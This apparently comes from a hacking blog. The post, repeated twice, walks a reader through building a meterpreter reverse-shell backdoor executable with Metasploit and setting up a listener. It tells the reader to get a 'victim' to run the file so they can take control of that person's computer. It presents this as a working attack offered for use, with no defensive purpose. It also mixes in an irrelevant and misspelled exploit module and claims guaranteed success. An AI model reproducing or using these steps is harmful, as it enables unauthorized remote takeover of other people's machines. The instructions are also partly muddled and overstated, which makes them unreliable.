HELLO
HERE TO HACK AN WINDOWS 8 WE ARE GOING TO CREATE A BACK DOOR VIRUS.....!
THINGS YOU NEED :
1) KALI LINUX( BECAUSE IT IS MOST UPDATED THAN BACKTRACK 5 R3)
2)NET CONNECTION
3)AND ..........................................................................AN VICTIM
NOW LETS GET STARTED
PROCESS:
OPEN A TERMINAL AND TYPE:: msfconsole
THEN TYPE::
msf > use windows/smb/ms08_067_netapi
NOW OPEN AN NEW TERMINAL AND TYPE::
msfpayload windows/meterpreter/reverse_tcp LHOST=your ip address LPORT=4444 x > /usr/info.exe
NOW GO TO COMPUTER --------SYSTEM FILES--------USR-------------INFO.EXE(THE BACKDOOR VIRUS FILE)
YOU NEED TO INSTALL THIS FILE IN YOUR VICTIM COMPUTER
NOW GET BACK TO THE 1ST TERMINAL
THEN TYPE:
msf exploit (handler) > set LHOST your ip adress
THEN TYPE:
msf exploit (handler) > set LPORT 4444
THEN TYPE:
msf exploit (handler) > exploit
NOTE :::
MAKE SURE YOUR VICTIM WILL CLICK THE INFO.EXE FILE
WHEN THE TERMINAL WILL SHOW
[*] starting the payload handler...
WHEN YOU WILL HACK THE VICTIM'S COMPUTER YOU WILL GET
meterpreter >
{inoder to make sure that you hacked it
type
meterpreter > sysinfo}
IT WILL 100% WORK.......:)
to get meterpreter best command go to:http://letsgohackers.blogspot.in/2014/05/best-meterpreter-commands.html
HERE TO HACK AN WINDOWS 8 WE ARE GOING TO CREATE A BACK DOOR VIRUS.....!
THINGS YOU NEED :
1) KALI LINUX( BECAUSE IT IS MOST UPDATED THAN BACKTRACK 5 R3)
2)NET CONNECTION
3)AND ..........................................................................AN VICTIM
NOW LETS GET STARTED
PROCESS:
OPEN A TERMINAL AND TYPE:: msfconsole
THEN TYPE::
msf > use windows/smb/ms08_067_netapi
NOW OPEN AN NEW TERMINAL AND TYPE::
msfpayload windows/meterpreter/reverse_tcp LHOST=your ip address LPORT=4444 x > /usr/info.exe
NOW GO TO COMPUTER --------SYSTEM FILES--------USR-------------INFO.EXE(THE BACKDOOR VIRUS FILE)
YOU NEED TO INSTALL THIS FILE IN YOUR VICTIM COMPUTER
NOW GET BACK TO THE 1ST TERMINAL
THEN TYPE
msf exploit(m08_067_netapi) > use multi/handlerTHEN TYPE:
msf exploit (handler) > set LHOST your ip adress
THEN TYPE:
msf exploit (handler) > set LPORT 4444
THEN TYPE:
msf exploit (handler) > exploit
NOTE :::
MAKE SURE YOUR VICTIM WILL CLICK THE INFO.EXE FILE
WHEN THE TERMINAL WILL SHOW
[*] starting the payload handler...
WHEN YOU WILL HACK THE VICTIM'S COMPUTER YOU WILL GET
meterpreter >
{inoder to make sure that you hacked it
type
meterpreter > sysinfo}
IT WILL 100% WORK.......:)
to get meterpreter best command go to:http://letsgohackers.blogspot.in/2014/05/best-meterpreter-commands.html
Comments
Post a Comment